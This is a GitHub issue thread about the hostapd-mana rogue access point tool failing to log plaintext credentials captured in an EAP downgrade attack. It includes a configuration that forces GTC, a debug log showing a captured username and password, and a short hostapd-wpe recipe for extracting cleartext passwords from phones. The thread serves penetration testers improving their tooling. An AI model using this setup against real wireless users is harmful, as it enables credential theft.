Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Creds not logged #13

Closed
Lexus89 opened this issue May 2, 2017 · 7 comments
Closed

Creds not logged #13

Lexus89 opened this issue May 2, 2017 · 7 comments

Comments

@Lexus89
Copy link

Lexus89 commented May 2, 2017

When performing a EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs?

hostapd.eap_user:

"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]

Hostapd log:

EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-Identity: Peer identity - hexdump_ascii(len=6):
68 61 63 6b 65 72 hacker
MANA (EAP) : identity: hacker
...
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-PEAP: received Phase 2: code=2 identifier=14 length=15
EAP-GTC: Response - hexdump_ascii(len=10):
70 61 73 73 77 6f 72 64 30 31 password01
EAP-GTC: Done - Failure
EAP-PEAP: Phase2 method failed
EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ
EAP: EAP entering state METHOD_REQUEST
EAP: building EAP-Request: Identifier 15
EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04

@singe
Copy link
Contributor

singe commented May 2, 2017 via email

@derekkddj
Copy link

Hi,
Did you find how to make EAP dumb-down attack works in hostapd-mana? Y see that the android device just try to use MSCHAPv2 instead of GTC, even when it does not have 2phase authentication method selected.
WIth freeradius-wpe I can make this attack works, but not with hostpad-mana.

Regards

@Lexus89
Copy link
Author

Lexus89 commented Oct 6, 2017

I believe it was by changing the order of methods in the hostapd.eap_user file..

@derekkddj
Copy link

Hi,

Thanks for the reply, do you have an example file I can see?
I am not hable to make this attack works..
Maybe is using this line of configuration?:
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]

Regards

@singe
Copy link
Contributor

singe commented May 21, 2018

I log PAP plaintext, not GTC. Will add it. Thanks.

@W00t3k
Copy link

W00t3k commented Jul 18, 2018

https://twitter.com/W00Tock/status/1019251419310972930

Edit file "hostapd-wpe.eap_user" (You can replace PEAP with FAST)

PEAP [ver=1]
"t" GTC "password" [2]
./hostapd-wpe hostapd-wpe.conf -ddddd
-snip- EAP-GTC: Response password: -snip-

By configuring the eap)user file, you can request from Apple and Android devices a GTC clear text password - which is shown in the debug console, but is currently not logged.

Thanks Singe, thought this might help you find that bug...

@singe
Copy link
Contributor

singe commented Aug 21, 2018

Thanks everyone. I now log GTC, you can see the code at https://github.com/sensepost/hostapd-mana/blob/master/src/eap_server/eap_server.c#L2136

@singe singe closed this as completed Aug 21, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

4 participants